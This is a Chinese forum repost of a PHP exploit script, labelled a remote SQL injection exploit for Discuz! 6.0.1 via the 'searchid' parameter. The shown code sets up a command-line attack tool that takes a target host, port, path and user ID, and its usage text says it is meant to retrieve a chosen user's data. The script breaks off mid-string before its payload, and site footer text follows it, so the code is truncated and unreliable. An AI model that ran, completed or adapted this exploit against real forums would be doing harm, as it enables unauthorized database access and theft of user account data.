Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

发布者: 霞绮2878 | 发布时间: 2025-6-28 22:38| 查看数: 44| 评论数: 0|帖子模式

<?php
error_reporting(E_ALL&E_NOTICE);
print_r("
------------------------------------------------------------------
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY  james
------------------------------------------------------------------
");

if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo "Usage: php ".$argv[0]." host port path uid\n";
echo "host:    target server \n";
echo "port:    the web port, usually 80\n";
echo "path:    path to discuz\n";
echo "uid :    user ID you wanna get\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost 80 1\n";
exit;
}

$content ="action=search&searchid=22
来源：https://www.jb51.net/hack/5592.html
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

最新评论

新人须知

常见问题

维权申诉

关注微博

扫描微信

关于合作

通讯联系